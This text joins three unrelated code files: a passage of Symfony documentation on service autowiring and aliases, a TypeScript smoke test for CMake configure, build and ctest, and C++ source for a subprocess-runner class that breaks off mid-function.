If you're using the :ref:`default services.yaml configuration <service-container-services-load-example>`,
**both classes are automatically registered as services and configured to be autowired**.
This means you can use them immediately without *any* configuration.
However, to understand autowiring better, the following examples explicitly configure
both services:
.. configuration-block::
.. code-block:: yaml
# config/services.yaml
services:
_defaults:
autowire: true
autoconfigure: true
# ...
App\Service\TwitterClient:
# redundant thanks to _defaults, but value is overridable on each service
autowire: true
App\Util\Rot13Transformer:
autowire: true
.. code-block:: xml
<!-- config/services.xml -->
<?xml version="1.0" encoding="UTF-8" ?>
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services https://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<defaults autowire="true" autoconfigure="true"/>
<!-- ... -->
<!-- autowire is redundant thanks to defaults, but value is overridable on each service -->
<service id="App\Service\TwitterClient" autowire="true"/>
<service id="App\Util\Rot13Transformer" autowire="true"/>
</services>
</container>
.. code-block:: php
// config/services.php
return function(ContainerConfigurator $configurator) {
$services = $configurator->services()
->defaults()
->autowire()
->autoconfigure()
;
$services->set(TwitterClient::class)
// redundant thanks to defaults, but value is overridable on each service
->autowire();
$services->set(Rot13Transformer::class)
->autowire();
};
Now, you can use the ``TwitterClient`` service immediately in a controller::
namespace App\Controller;
use App\Service\TwitterClient;
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\Routing\Annotation\Route;
class DefaultController extends AbstractController
{
/**
* @Route("/tweet", methods={"POST"})
*/
public function tweet(TwitterClient $twitterClient)
{
// fetch $user, $key, $status from the POST'ed data
$twitterClient->tweet($user, $key, $status);
// ...
}
}
This works automatically! The container knows to pass the ``Rot13Transformer`` service
as the first argument when creating the ``TwitterClient`` service.
.. _autowiring-logic-explained:
Autowiring Logic Explained
--------------------------
Autowiring works by reading the ``Rot13Transformer`` *type-hint* in ``TwitterClient``::
// ...
use App\Util\Rot13Transformer;
class TwitterClient
{
// ...
public function __construct(Rot13Transformer $transformer)
{
$this->transformer = $transformer;
}
}
The autowiring system **looks for a service whose id exactly matches the type-hint**:
so ``App\Util\Rot13Transformer``. In this case, that exists! When you configured
the ``Rot13Transformer`` service, you used its fully-qualified class name as its
id. Autowiring isn't magic: it looks for a service whose id matches the type-hint.
If you :ref:`load services automatically <service-container-services-load-example>`,
each service's id is its class name.
If there is *not* a service whose id exactly matches the type, a clear exception
will be thrown.
Autowiring is a great way to automate configuration, and Symfony tries to be as
*predictable* and clear as possible.
.. _service-autowiring-alias:
Using Aliases to Enable Autowiring
----------------------------------
The main way to configure autowiring is to create a service whose id exactly matches
its class. In the previous example, the service's id is ``App\Util\Rot13Transformer``,
which allows us to autowire this type automatically.
This can also be accomplished using an :ref:`alias <services-alias>`. Suppose that
for some reason, the id of the service was instead ``app.rot13.transformer``. In
this case, any arguments type-hinted with the class name (``App\Util\Rot13Transformer``)
can no longer be autowired.
No problem! To fix this, you can *create* a service whose id matches the class by
adding a service alias:
.. configuration-block::
.. code-block:: yaml
# config/services.yaml
services:
# ...
# the id is not a class, so it won't be used for autowiring
app.rot13.transformer:
class: App\Util\Rot13Transformer
# ...
# but this fixes it!
# the ``app.rot13.transformer`` service will be injected when
# an ``App\Util\Rot13Transformer`` type-hint is detected
App\Util\Rot13Transformer: '@app.rot13.transformer'
.. code-block:: xml
<!-- config/services.xml -->
<?xml version="1.0" encoding="UTF-8" ?>
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services https://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<!-- ... -->
<service id="app.rot13.transformer" class="App\Util\Rot13Transformer" autowire="true"/>
<service id="App\Util\Rot13Transformer" alias="app.rot13.transformer"/>
</services>
</container>
.. code-block:: php
// config/services.php
namespace Symfony\Component\DependencyInjection\Loader\Configurator;
use App\Util\Rot13Transformer;
return function(ContainerConfigurator $configurator) {
// ...
// the id is not a class, so it won't be used for autowiring
$services->set('app.rot13.transformer', Rot13Transformer::class)
->autowire();
// but this fixes it!
// the ``app.rot13.transformer`` service will be injected when
// an ``App\Util\Rot13Transformer`` type-hint is detected
$services->alias(Rot13Transformer::class, 'app.rot13.transformer');
};
This creates a service "alias", whose id is ``App\Util\Rot13Transformer``.
Thanks to this, autowiring sees this and uses it whenever the ``Rot13Transformer``
class is type-hinted.
.. tip::
Aliases are used by the core bundles to allow services to be autowired. For
example, MonologBundle creates a service whose id is ``logger``. But it also
adds an alias: ``Psr\Log\LoggerInterface`` that points to the ``logger`` service.
This is why arguments type-hinted with ``Psr\Log\LoggerInterface`` can be autowired.
.. _autowiring-interface-alias:
Working with Interfaces
-----------------------
You might also find yourself type-hinting abstractions (e.g. interfaces) instead
of concrete classes, as doing so makes it easier to replace your dependencies with other objects.
To follow this best practice, suppose you decide to create a ``TransformerInterface``::
namespace App\Util;
interface TransformerInterface
{
public function transform($value);
}
Then, you update ``Rot13Transformer`` to implement it::
// ...
class Rot13Transformer implements TransformerInterface
{
// ...
}
Now that you have an interface, you should use this as your type-hint::
class TwitterClient
{
public function __construct(TransformerInterface $transformer)
{
// ...
}
// ...
}
But now, the type-hint (``App\Util\TransformerInterface``) no longer matches
the id of the service (``App\Util\Rot13Transformer``). This means that the
argument can no longer be autowired.
To fix that, add an :ref:`alias <service-autowiring-alias>`:
.. configuration-block::
.. code-block:: yaml
# config/services.yaml
services:
# ...
App\Util\Rot13Transformer: ~
# the ``App\Util\Rot13Transformer`` service will be injected when
# an ``App\Util\TransformerInterface`` type-hint is detected
App\Util\TransformerInterface: '@App\Util\Rot13Transformer'
.. code-block:: xml
<!-- config/services.xml -->
<?xml version="1.0" encoding="UTF-8" ?>
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services https://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<!-- ... -->
<service id="App\Util\Rot13Transformer"/>
<service id="App\Util\TransformerInterface" alias="App\Util\Rot13Transformer"/>
</services>
</container>
.. code-block:: php
// config/services.php
namespace Symfony\Component\DependencyInjection\Loader\Configurator;
use App\Util\Rot13Transformer;
use App\Util\TransformerInterface;
return function(ContainerConfigurator $configurator) {
// ...
$services->set(Rot13Transformer::class);
// the ``App\Util\Rot13Transformer`` service will be injected when
// an ``App\Util\TransformerInterface`` type-hint is detected
$services->alias(TransformerInterface::class, Rot13Transformer::class);
};
Thanks to the ``App\Util\TransformerInterface`` alias, the autowiring subsystem
knows that the ``App\Util\Rot13Transformer`` service should be injected when
dealing with the ``TransformerInterface``.
.. tip::
When using a `service definition prototype`_, if only one service is
discovered that implements an interface, and that interface is also
discovered in the same file, configuring the alias is not mandatory
and Symfony will automatically create one.
Dealing with Multiple Implementations of the Same Type
------------------------------------------------------
Suppose you create a second class - ``UppercaseTransformer`` that implements
``TransformerInterface``::
namespace App\Util;
class UppercaseTransformer implements TransformerInterface
{
public function transform($value)
{
return strtoupper($value);
}
}
If you register this as a service, you now have *two* services that implement the
``App\Util\TransformerInterface`` type. The autowiring subsystem cannot decide
which one to use. Remember, autowiring isn't magic; it looks for a service
whose id matches the type-hint. So you need to choose one by creating an alias
from the type to the correct service id (see :ref:`autowiring-interface-alias`).
Additionally, you can define several named autowiring aliases if you want to use
one implementation in some cases, and another implementation in some
other cases.
For instance, you may want to use the ``Rot13Transformer``
implementation by default when the ``TransformerInterface`` interface is
type hinted, but use the ``UppercaseTransformer`` implementation in some
specific cases. To do so, you can create a normal alias from the
``TransformerInterface`` interface to ``Rot13Transformer``, and then
create a *named autowiring alias* from a special string containing the
interface followed by a variable name matching the one you use when doing
the injection::
namespace App\Service;
use App\Util\TransformerInterface;
class MastodonClient
{
private $transformer;
public function __construct(TransformerInterface $shoutyTransformer)
{
$this->transformer = $shoutyTransformer;
}
public function toot($user, $key, $status)
{
$transformedStatus = $this->transformer->transform($status);
// ... connect to Mastodon and send the transformed status
}
}
.. configuration-block::
.. code-block:: yaml
# config/services.yaml
services:
# ...
App\Util\Rot13Transformer: ~
App\Util\UppercaseTransformer: ~
# the ``App\Util\UppercaseTransformer`` service will be
# injected when an ``App\Util\TransformerInterface``
# type-hint for a ``$shoutyTransformer`` argument is detected.
App\Util\TransformerInterface $shoutyTransformer: '@App\Util\UppercaseTransformer'
# If the argument used for injection does not match, but the
# type-hint still matches, the ``App\Util\Rot13Transformer``
# service will be injected.
App\Util\TransformerInterface: '@App\Util\Rot13Transformer'
App\Service\TwitterClient:
# the Rot13Transformer will be passed as the $transformer argument
autowire: true
# If you wanted to choose the non-default service and do not
# want to use a named autowiring alias, wire it manually:
# $transformer: '@App\Util\UppercaseTransformer'
# ...
.. code-block:: xml
<!-- config/services.xml -->
<?xml version="1.0" encoding="UTF-8" ?>
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services https://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<!-- ... -->
<service id="App\Util\Rot13Transformer"/>
<service id="App\Util\UppercaseTransformer"/>
<service id="App\Util\TransformerInterface" alias="App\Util\Rot13Transformer"/>
<service
id="App\Util\TransformerInterface $shoutyTransformer"
alias="App\Util\UppercaseTransformer"/>
<service id="App\Service\TwitterClient" autowire="true">
<!-- <argument key="$transformer" type="service" id="App\Util\UppercaseTransformer"/> -->
</service>
</services>
</container>
.. code-block:: php
// config/services.php
namespace Symfony\Component\DependencyInjection\Loader\Configurator;
use App\Service\MastodonClient;
use App\Service\TwitterClient;
use App\Util\Rot13Transformer;
use App\Util\TransformerInterface;
use App\Util\UppercaseTransformer;
return function(ContainerConfigurator $configurator) {
// ...
$services->set(Rot13Transformer::class)->autowire();
$services->set(UppercaseTransformer::class)->autowire();
// the ``App\Util\UppercaseTransformer`` service will be
// injected when an ``App\Util\TransformerInterface``
// type-hint for a ``$shoutyTransformer`` argument is detected.
$services->alias(TransformerInterface::class.' $shoutyTransformer', UppercaseTransformer::class);
// If the argument used for injection does not match, but the
// type-hint still matches, the ``App\Util\Rot13Transformer``
// service will be injected.
$services->alias(TransformerInterface::class, Rot13Transformer::class);
$services->set(TwitterClient::class)
// the Rot13Transformer will be passed as the $transformer argument
->autowire()
// If you wanted to choose the non-default service and do not
// want to use a named autowiring alias, wire it manually:
// ->arg('$transformer', service(UppercaseTransformer::class))
// ...
};
Thanks to the ``App\Util\TransformerInterface`` alias, any argument type-hinted
with this interface will be passed the ``App\Util\Rot13Transformer`` service.
If the argument is named ``$shoutyTransformer``,
``App\Util\UppercaseTransformer`` will be used instead.
But, you can also manually wire any *other* service by specifying the argument
under the arguments key.
Fixing Non-Autowireable Arguments
---------------------------------
Autowiring only works when your argument is an *object*. But if you have a scalar
argument (e.g. a string), this cannot be autowired: Symfony will throw a clear
exception.
To fix this, you can :ref:`manually wire the problematic argument <services-manually-wire-args>`.
You wire up the difficult arguments, Symfony takes care of the rest.
.. _autowiring-calls:
Autowiring other Methods (e.g. Setters and Public Typed Properties)
-------------------------------------------------------------------
When autowiring is enabled for a service, you can *also* configure the container
to call methods on your class when it's instantiated. For example, suppose you want
to inject the ``logger`` service, and decide to use setter-injection::
namespace App\Util;
class Rot13Transformer
{
private $logger;
/**
* @required
*/
public function setLogger(LoggerInterface $logger)
{
$this->logger = $logger;
}
public function transform($value)
{
$this->logger->info('Transforming '.$value);
// ...
}
}
Autowiring will automatically call *any* method with the ``@required`` annotation
above it, autowiring each argument. If you need to manually wire some of the arguments
to a method, you can always explicitly :doc:`configure the method call </service_container/calls>`.
Although property injection has some :ref:`drawbacks <property-injection>`, autowiring with the ``@required`` annotation
can also be applied to public typed properties::
namespace App\Util;
class Rot13Transformer
{
/** @required */
public LoggerInterface $logger;
public function transform($value)
{
$this->logger->info('Transforming '.$value);
// ...
}
}
.. versionadded:: 5.1
Public typed properties autowiring was introduced in Symfony 5.1.
Autowiring Controller Action Methods
------------------------------------
If you're using the Symfony Framework, you can also autowire arguments to your controller
action methods. This is a special case for autowiring, which exists for convenience.
See :ref:`controller-accessing-services` for more details.
Performance Consequences
------------------------
Thanks to Symfony's compiled container, there is *no* performance penalty for using
autowiring. However, there is a small performance penalty in the ``dev`` environment,
as the container may be rebuilt more often as you modify classes. If rebuilding
your container is slow (possible on very large projects), you may not be able to
use autowiring.
Public and Reusable Bundles
---------------------------
Public bundles should explicitly configure their services and not rely on autowiring.
Autowiring depends on the services that are available in the container and bundles have
no control over the service container of applications they are included in. You can use
autowiring when building reusable bundles within your company, as you have full control
over all code.
.. _ROT13: https://en.wikipedia.org/wiki/ROT13
.. _service definition prototype: https://symfony.com/blog/new-in-symfony-3-3-psr-4-based-service-discovery
| {
"pile_set_name": "Github"
} |
import {expect} from 'chai';
import * as path from 'path';
import {smokeSuite, smokeTestDefaultKit} from '../smoke';
/**
* This test aims to check what occurs when CTest is not in the same directory
* as the cmake executable
*/
// tslint:disable:no-unused-expression
// Verifies that configure/build/ctest succeed when the cmake executable lives
// in a bin/ directory that does not also contain ctest.
smokeSuite('no-ctest-in-bindir', suite => {
  suite.smokeTest('configure', async ctx => {
    return ctx.withCMakeTools({
      kit: await smokeTestDefaultKit(),
      async run(cmt) {
        // Strict equality: process.platform is a string, so `===` is the
        // correct comparison (the loose `==` worked but violates TS idiom).
        const cmake_filename = process.platform === 'win32' ? 'cmake.bat' : 'cmake.sh';
        // Point cmake-tools at the wrapper script inside the test project.
        cmt.workspaceContext.config.updatePartial({
          cmakePath: path.join(ctx.projectDir.uri.fsPath, 'bin', cmake_filename),
        });
        expect(await cmt.configure()).to.eq(0);
        expect(await cmt.build()).to.eq(0);
        expect(await cmt.ctest()).to.eq(0);
      }
    });
  });
});
| {
"pile_set_name": "Github"
} |
/* runner.cc -*- C++ -*-
Wolfgang Sourdeau, September 2013
Copyright (c) 2013 Datacratic. All rights reserved.
A command runner class that hides the specifics of the underlying unix
system calls and can intercept input and output.
*/
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <iostream>
#include <utility>
#include "jml/arch/futex.h"
#include "jml/arch/timers.h"
#include "jml/utils/guard.h"
#include "jml/utils/file_functions.h"
#include "logs.h"
#include "message_loop.h"
#include "sink.h"
#include "runner.h"
#include "soa/types/basic_value_descriptions.h"
#include <future>
using namespace std;
using namespace Datacratic;
/* Value description for struct timeval: exposes tv_sec/tv_usec for
   (de)serialization; tv_usec defaults to 0. */
timevalDescription::
timevalDescription()
{
    addField("tv_sec", &timeval::tv_sec, "seconds");
    addField("tv_usec", &timeval::tv_usec, "micro seconds", (long)0);
}
/* Value description for struct rusage: maps every resource-usage counter to
   a field name; all counters except the CPU times default to 0. */
rusageDescription::
rusageDescription()
{
    addField("utime", &rusage::ru_utime, "user CPU time used");
    addField("stime", &rusage::ru_stime, "system CPU time used");
    addField("maxrss", &rusage::ru_maxrss, "maximum resident set size", (long)0);
    addField("ixrss", &rusage::ru_ixrss, "integral shared memory size", (long)0);
    addField("idrss", &rusage::ru_idrss, "integral unshared data size", (long)0);
    addField("isrss", &rusage::ru_isrss, "integral unshared stack size", (long)0);
    addField("minflt", &rusage::ru_minflt, "page reclaims (soft page faults)", (long)0);
    addField("majflt", &rusage::ru_majflt, "page faults (hard page faults)", (long)0);
    addField("nswap", &rusage::ru_nswap, "swaps", (long)0);
    addField("inblock", &rusage::ru_inblock, "block input operations", (long)0);
    addField("oublock", &rusage::ru_oublock, "block output operations", (long)0);
    addField("msgsnd", &rusage::ru_msgsnd, "IPC messages sent", (long)0);
    addField("msgrcv", &rusage::ru_msgrcv, "IPC messages received", (long)0);
    addField("nsignals", &rusage::ru_nsignals, "signals received", (long)0);
    addField("nvcsw", &rusage::ru_nvcsw, "voluntary context switches", (long)0);
    addField("nivcsw", &rusage::ru_nivcsw, "involuntary context switches", (long)0);
}
namespace {

Logging::Category warnings("Runner::warning");

/* Create a unidirectional pipe for talking to a child process.
   Returns (parent end, child end): when 'forWriting' is true the parent gets
   the write end (to feed the child's stdin); otherwise the parent gets the
   read end (to drain the child's stdout/stderr).
   Throws ML::Exception with errno on failure. */
tuple<int, int>
CreateStdPipe(bool forWriting)
{
    int fds[2];
    int rc = pipe(fds);
    if (rc == -1) {
        // Error message fixed: the call above is pipe(), not pipe2().
        throw ML::Exception(errno, "CreateStdPipe pipe");
    }
    if (forWriting) {
        return tuple<int, int>(fds[1], fds[0]);
    }
    else {
        return tuple<int, int>(fds[0], fds[1]);
    }
}

} // namespace
namespace Datacratic {
/****************************************************************************/
/* RUNNER */
/****************************************************************************/
/* Definition of the static helper-program path; assigned elsewhere (the
   assignment is not visible in this chunk). */
std::string Runner::runnerHelper;

/* Construct an idle Runner: no child yet (childPid_ == -1), no stdin pipe
   (childStdinFd_ == -1), and a full status message still pending
   (statusRemaining_ == sizeof(ProcessStatus)). */
Runner::
Runner()
    : EpollLoop(nullptr),
      closeStdin(false), runRequests_(0), activeRequest_(0), running_(false),
      startDate_(Date::negativeInfinity()), endDate_(startDate_),
      childPid_(-1), childStdinFd_(-1),
      statusRemaining_(sizeof(ProcessStatus))
{
}
/* Destructor: ask any child process to terminate with SIGTERM so it does not
   outlive the Runner. (The second argument's meaning — presumably whether to
   throw/wait on failure — should be confirmed against kill()'s declaration
   in runner.h.) */
Runner::
~Runner()
{
    kill(SIGTERM, false);
}
/* Epoll callback for the status fd shared with the launcher process.
   Drains fixed-size ProcessStatus messages (which may arrive split across
   reads) and advances the task state machine
   (LAUNCHING -> RUNNING -> STOPPED -> DONE). On EPOLLHUP with the task still
   live, treats the situation as the parent/fork thread having exited and
   finalizes the task locally. */
void
Runner::
handleChildStatus(const struct epoll_event & event)
{
    ProcessStatus status;
    if ((event.events & EPOLLIN) != 0) {
        while (1) {
            // Resume filling the status buffer where a previous partial read
            // left off.
            char * current = (statusBuffer_ + sizeof(ProcessStatus)
                              - statusRemaining_);
            ssize_t s = ::read(task_.statusFd, current, statusRemaining_);
            if (s == -1) {
                if (errno == EWOULDBLOCK) {
                    // Nothing more to read for now.
                    break;
                }
                else if (errno == EBADF || errno == EINVAL) {
                    /* This happens when the pipe or socket was closed by the
                       remote process before "read" was called (race
                       condition). */
                    break;
                }
                throw ML::Exception(errno, "Runner::handleChildStatus read");
            }
            else if (s == 0) {
                // EOF: writer side gone.
                break;
            }
            statusRemaining_ -= s;
            if (statusRemaining_ > 0) {
                // Partial message; keep reading.
                continue;
            }
            memcpy(&status, statusBuffer_, sizeof(status));
            // Set up for next message
            statusRemaining_ = sizeof(statusBuffer_);
            task_.statusState = status.state;
            task_.runResult.usage = status.usage;
            if (status.launchErrno
                || status.launchErrorCode != LaunchError::NONE) {
                // Error
                task_.runResult.updateFromLaunchError
                    (status.launchErrno,
                     strLaunchError(status.launchErrorCode));
                task_.statusState = ProcessState::STOPPED;
            }
            switch (status.state) {
            case ProcessState::LAUNCHING:
                childPid_ = status.pid;
                break;
            case ProcessState::RUNNING:
                childPid_ = status.pid;
                // Wake anyone blocked waiting for the pid to become known.
                ML::futex_wake(childPid_);
                break;
            case ProcessState::STOPPED:
                // Negative sentinels record why the child is gone:
                // -2 = launch error, -3 = normal termination.
                if (task_.runResult.state == RunResult::LAUNCH_ERROR) {
                    childPid_ = -2;
                }
                else {
                    task_.runResult.updateFromStatus(status.childStatus);
                    childPid_ = -3;
                }
                ML::futex_wake(childPid_);
                task_.statusState = ProcessState::DONE;
                if (stdInSink_ && stdInSink_->state != OutputSink::CLOSED) {
                    stdInSink_->requestClose();
                }
                attemptTaskTermination();
                break;
            case ProcessState::DONE:
                throw ML::Exception("unexpected status DONE");
            case ProcessState::UNKNOWN:
                throw ML::Exception("unexpected status UNKNOWN");
            }
            if (status.launchErrno
                || status.launchErrorCode != LaunchError::NONE)
                break;
        }
    }
    if ((event.events & EPOLLHUP) != 0) {
        // This happens when the thread that launched the process exits,
        // and the child process follows.
        removeFd(task_.statusFd, true);
        ::close(task_.statusFd);
        task_.statusFd = -1;
        if (task_.statusState == ProcessState::RUNNING
            || task_.statusState == ProcessState::LAUNCHING) {
            cerr << "*************************************************************" << endl;
            cerr << " HANGUP ON STATUS FD: RUNNER FORK THREAD EXITED?" << endl;
            cerr << "*************************************************************" << endl;
            cerr << "state = " << jsonEncode(task_.runResult.state) << endl;
            cerr << "statusState = " << (int)task_.statusState << endl;
            cerr << "childPid_ = " << childPid_ << endl;
            // We will never get another event, so we need to clean up
            // everything here.
            childPid_ = -3;
            ML::futex_wake(childPid_);
            task_.runResult.state = RunResult::PARENT_EXITED;
            task_.runResult.signum = SIGHUP;
            task_.statusState = ProcessState::DONE;
            if (stdInSink_ && stdInSink_->state != OutputSink::CLOSED) {
                stdInSink_->requestClose();
            }
            attemptTaskTermination();
        }
    }
}
/* Epoll callback for one of the child's output pipes (stdout or stderr):
   drain all currently-available bytes into 'sink'; on EOF or hangup, close
   the fd, notify and release the sink, and check whether the whole task can
   now be finalized. */
void
Runner::
handleOutputStatus(const struct epoll_event & event,
                   int & outputFd, shared_ptr<InputSink> & sink)
{
    char buffer[4096];
    bool closedFd(false);
    string data;
    if ((event.events & EPOLLIN) != 0) {
        while (1) {
            ssize_t len = ::read(outputFd, buffer, sizeof(buffer));
            if (len < 0) {
                if (errno == EWOULDBLOCK) {
                    // Drained everything currently available.
                    break;
                }
                else if (errno == EBADF || errno == EINVAL) {
                    /* This happens when the pipe or socket was closed by the
                       remote process before "read" was called (race
                       condition). */
                    closedFd = true;
                    break;
                }
                else {
                    throw ML::Exception(errno,
                                        "Runner::handleOutputStatus read");
                }
            }
            else if (len == 0) {
                // EOF: the writing side has closed.
                closedFd = true;
                break;
            }
            else if (len > 0) {
                data.append(buffer, len);
            }
        }
        if (data.size() > 0) {
            sink->notifyReceived(move(data));
        }
    }
    if (closedFd || (event.events & EPOLLHUP) != 0) {
        ExcAssert(sink != nullptr);
        sink->notifyClosed();
        sink.reset();
        if (outputFd > -1) {
            removeFd(outputFd, true);
            ::close(outputFd);
            outputFd = -1;
        }
        // Releasing this sink may have been the last outstanding condition
        // for task termination.
        attemptTaskTermination();
    }
}
/* Finalize the task if — and only if — every asynchronous shutdown condition
   has been met; safe to call repeatedly from any of the event handlers. */
void
Runner::
attemptTaskTermination()
{
    /* There is a set of things that occurs spontaneously when a process
       exits, due to the way Linux (possibly POSIX) handles processes, file
       descriptors, etc. For example, the stdout/stderr channels of a
       subprocess are always going to be closed when the relevant process
       exits and all the data written by the program will be flushed from the
       kernel buffers. Even though this may not occur in order, all of those
       events will occur and will be caught by our epoll queue. This is the
       basis of how we handle events throughout the Runner class.

       For a task to be considered done:
       - stdout and stderr must have been closed, provided we redirected them
       - the closing child status must have been returned
       - stdInSink must either be null or its state considered "closed"

       This is a requirement for absolutely *all* conditions: whether the
       calls to "fork" and "exec" have succeeded, whether the underlying
       program has been successfully run or not. But, although they are
       guaranteed to occur, those events do not specifically occur in a
       deterministic order.

       Since those checks must be performed at various places, the same
       conditions must all be checked all the time and the same operations
       must be performed when they are all met. This is what
       "attemptTaskTermination" does.
    */
    if ((!stdInSink_
         || stdInSink_->state == OutputSink::CLOSED
         || stdInSink_->state == OutputSink::CLOSING)
        && !stdOutSink_ && !stdErrSink_ && childPid_ < 0
        && (task_.statusState == ProcessState::STOPPED
            || task_.statusState == ProcessState::DONE)) {
        // Move the result and callback out before postTerminate resets the
        // task, so they survive the cleanup.
        auto runResult = move(task_.runResult);
        auto onTerminate = move(task_.onTerminate);
        task_.postTerminate(*this);
        if (stdInSink_) {
            stdInSink_.reset();
        }
        endDate_ = Date::now();
        ExcAssert(onTerminate);
        onTerminate(runResult);
        /* Setting running_ to false must be done after "onTerminate" is
           invoked, since "waitTermination" guarantees that "onTerminate" has
           been called. In async mode, doing it here will not be a problem,
           since "running_" will be reset to true when the MessageLoop
           processes its delayed jobs. */
        running_ = false;
        ML::futex_wake(running_);
    }
    /* This block is useful for debugging the termination workflow of the
       subprocess, therefore it should be kept 2 years after this date:
       2015-07-02. If uncommented, this date should be updated to the current
       date. */
    else if (false) {
        cerr << "cannot terminate yet because:\n";
        if ((stdInSink_ && stdInSink_->state != OutputSink::CLOSED)) {
            cerr << "stdin sink active\n";
        }
        if (stdOutSink_) {
            cerr << "stdout sink active\n";
        }
        if (stdErrSink_) {
            cerr << "stderr sink active\n";
        }
        if (childPid_ >= 0) {
            cerr << "childPid_ >= 0\n";
        }
        if (!(task_.statusState == ProcessState::STOPPED
              || task_.statusState == ProcessState::DONE)) {
            cerr << "task status != stopped/done\n";
        }
    }
}
/* Create — at most once, and before the child is launched — the sink used to
   feed data to the child's stdin. Returns a reference owned by this Runner.
   Throws if a stdin sink was already set. */
OutputSink &
Runner::
getStdInSink()
{
    if (stdInSink_) {
        throw ML::Exception("stdin sink already set");
    }
    ExcAssertEqual(childStdinFd_, -1);
    auto onClose = [&] () {
        // Close our write end of the stdin pipe and stop watching the sink's
        // fd; if the launcher process is already up, this may be the last
        // condition blocking task termination.
        if (task_.stdInFd != -1) {
            ::close(task_.stdInFd);
            task_.stdInFd = -1;
        }
        removeFd(stdInSink_->selectFd(), true);
        if (task_.wrapperPid > -1) {
            attemptTaskTermination();
        }
    };
    stdInSink_.reset(new AsyncFdOutputSink(onClose, onClose));
    tie(task_.stdInFd, childStdinFd_) = CreateStdPipe(true);
    ML::set_file_flag(task_.stdInFd, O_NONBLOCK);
    stdInSink_->init(task_.stdInFd);
    // Capture a shared_ptr copy so the sink stays alive for any epoll events
    // still queued after stdInSink_ itself is reset.
    auto stdinCopy = stdInSink_;
    auto stdinCb = [=] (const epoll_event & event) {
        stdinCopy->processOne();
    };
    addFd(stdInSink_->selectFd(), true, false, stdinCb);
    return *stdInSink_;
}
/* Start 'command' asynchronously. The fork/exec itself is deferred to the
   MessageLoop thread (see the comment below for why); completion — including
   launch failures — is always reported through the mandatory 'onTerminate'
   callback. Optional sinks receive the child's stdout/stderr. */
void
Runner::
run(const vector<string> & command,
    const OnTerminate & onTerminate,
    const shared_ptr<InputSink> & stdOutSink,
    const shared_ptr<InputSink> & stdErrSink)
{
    if (parent_ == nullptr) {
        LOG(warnings)
            << ML::format("Runner %p is not connected to any MessageLoop\n", this);
    }
    if (!onTerminate) {
        throw ML::Exception("'onTerminate' parameter is mandatory");
    }
    ExcAssert(runRequests_ < std::numeric_limits<int>::max());
    runRequests_++;
    /* We run this in the message loop thread, which becomes the parent of the
       child process. This is to avoid problems when the thread we're calling
       run from exits, and since it's the parent process of the fork, causes
       the subprocess to exit to due to PR_SET_DEATHSIG being set .*/
    auto toRun = [=] () {
        try {
            JML_TRACE_EXCEPTIONS(false);
            this->doRunImpl(command, onTerminate, stdOutSink, stdErrSink);
        }
        catch (const std::exception & exc) {
            /* Exceptions must be returned via onTerminate in order to provide
               a consistent behaviour when "run" is called from the original
               Runner thread or from the MessageLoop thread. "onTerminate" is
               mandatory and is thus guaranteed to exist here. */
            RunResult result;
            result.updateFromLaunchException(std::current_exception());
            ExcAssert(onTerminate);
            onTerminate(result);
        }
        catch (...) {
            cerr << ("FATAL: Runner::runImpl::toRun caught an unhandled"
                     " exception. MessageLoop thread will die.\n");
            throw;
        }
    };
    ExcAssert(parent_ != nullptr);
    bool res = parent_->runInMessageLoopThread(toRun);
    ExcAssert(res);
}
/* Runs "command" synchronously: launches it, optionally feeds "stdInData"
   to its stdin, then pumps the event loop in the calling thread until the
   subprocess has terminated.  Launch-time exceptions are rethrown in the
   caller's thread. */
RunResult
Runner::
runSync(const vector<string> & command,
        const shared_ptr<InputSink> & stdOutSink,
        const shared_ptr<InputSink> & stdErrSink,
        const string & stdInData)
{
    ExcAssert(runRequests_ < std::numeric_limits<int>::max());
    runRequests_++;

    RunResult result;
    bool terminated(false);
    auto onTerminate = [&] (const RunResult & newResult) {
        result = newResult;
        terminated = true;
    };

    /* The stdin sink must be created before launching so the pipe exists
       when the child is forked. */
    OutputSink * sink(nullptr);
    if (stdInData.size() > 0) {
        sink = &getStdInSink();
    }
    doRunImpl(command, onTerminate, stdOutSink, stdErrSink);
    if (sink) {
        sink->write(stdInData);
        sink->requestClose();
    }

    /* Drive the epoll loop ourselves until onTerminate fires. */
    while (!terminated) {
        loop(-1, -1);
    }

    if (result.state == RunResult::LAUNCH_EXCEPTION) {
        std::rethrow_exception(result.launchExc);
    }

    return result;
}
/* Actual launch implementation: sets up the status/stdio pipes, forks the
   wrapper process and registers the parent-side fds with the event loop.
   Runs in the MessageLoop thread (see Runner::run). */
void
Runner::
doRunImpl(const vector<string> & command,
          const OnTerminate & onTerminate,
          const shared_ptr<InputSink> & stdOutSink,
          const shared_ptr<InputSink> & stdErrSink)
{
    /* "activeRequest" must be increased after "running_" is set, in order to
       guarantee the continuity between "waitRunning" and "waitTermination".
    */
    bool oldRunning(running_);
    running_ = true;
    ML::futex_wake(running_);
    activeRequest_++;
    ML::futex_wake(activeRequest_);
    if (oldRunning) {
        throw ML::Exception("already running");
    }
    startDate_ = Date::now();
    endDate_ = Date::negativeInfinity();

    task_.onTerminate = onTerminate;

    /* Pipe over which the wrapper reports launch status back to us. */
    ProcessFds childFds;
    tie(task_.statusFd, childFds.statusFd) = CreateStdPipe(false);

    /* Hand the read end created by getStdInSink() (if any) to the child. */
    if (stdInSink_) {
        ExcAssert(childStdinFd_ != -1);
        childFds.stdIn = childStdinFd_;
        childStdinFd_ = -1;
    }
    else if (closeStdin) {
        childFds.stdIn = -1;
    }
    if (stdOutSink) {
        stdOutSink_ = stdOutSink;
